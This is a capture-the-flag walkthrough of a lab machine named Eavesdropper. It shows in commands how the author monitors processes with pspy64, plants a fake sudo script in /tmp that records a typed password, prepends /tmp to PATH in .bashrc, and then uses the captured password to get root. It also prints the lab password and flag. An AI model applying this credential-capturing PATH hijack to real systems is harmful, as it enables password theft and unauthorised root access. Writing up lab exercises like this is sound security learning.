Task 1. Download Keys
The room already provides an SSH private key for the user frank, so I started by downloading the attached key file and preparing it for SSH authentication.
Before using the key, I changed its permissions so SSH would accept it.
chmod 600 id-rsa-1647296932800.id-rsa
Once the permissions were fixed, I logged into the target machine as frank.
ssh frank@<IP> -i id-rsa-1647296932800.id-rsa
Initial Enumeration
Since the room is called Eavesdropper, I immediately started looking for anything related to background activity or processes running on the machine.
To monitor processes from other users, including root, I decided to use pspy64. First, I downloaded the binary on my attacker machine and transferred it to the target using SCP.
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
scp -i id-rsa-1647296932800.id-rsa pspy64 frank@<IP>:.
After transferring the binary, I gave it execution permissions and started monitoring the running processes.
chmod +x pspy64
./pspy64
After letting it run for a few moments, several processes started appearing continuously. One process immediately stood out:
CMD: UID=0 PID=662 | sudo cat /etc/shadow
This was interesting because the command was being executed as root, but it was using sudo without a full path.
That behavior suggested the command might be vulnerable to PATH hijacking. It also looked like the process was being triggered automatically whenever a user logged in through SSH.
At this point, the goal became clear. If I could place a fake sudo binary earlier in the PATH, the system would execute my malicious version instead of the legitimate one.
Privilege Escalation
To exploit this behavior, I created a fake sudo script inside /tmp.
cat > /tmp/sudo << 'EOF'
#!/bin/bash
read -p "Test" password
echo $password > /home/frank/pass.txt
EOF
The script simply waits for user input and stores whatever is entered into a file called pass.txt.
After creating the script, I made it executable.
chmod +x /tmp/sudo
Next, I modified frank’s PATH variable so the system would search /tmp before the legitimate system directories.
sed -i '4iPATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin' ~/.bashrc
To verify the change, I checked the first few lines of .bashrc.
head -n 6 ~/.bashrc
Then I reloaded the configuration.
source ~/.bashrc
Triggering the Exploit
With everything prepared, I logged out and connected back through SSH.
exit
ssh -i id-rsa-1647296932800.id-rsa frank@<IP>
During login, the automated process executed sudo cat /etc/shadow.
Because /tmp appeared first in the PATH variable, the system executed my fake sudo script instead of the real binary. The password entered by root was captured and written into /home/frank/pass.txt.
I checked the file and recovered the password:
!@#frankisawesome2022%*
Root Access
Using the captured password, I switched to root.
/usr/bin/sudo su
[sudo] password for frank: !@#frankisawesome2022%*
Once authenticated, I successfully gained root access and retrieved the flag from the root home directory.
Flag
flag{14370304172628f784d8e8962d54a600}
Conclusion
Eavesdropper was a short but interesting room focused on process monitoring and PATH hijacking. The biggest clue came from observing background activity with pspy64, which eventually revealed a vulnerable execution flow that could be abused to capture credentials and gain root access.
Thanks for reading this walkthrough. I hope it helped you understand the room and follow the privilege escalation process clearly.
You can check out more of my walkthroughs here: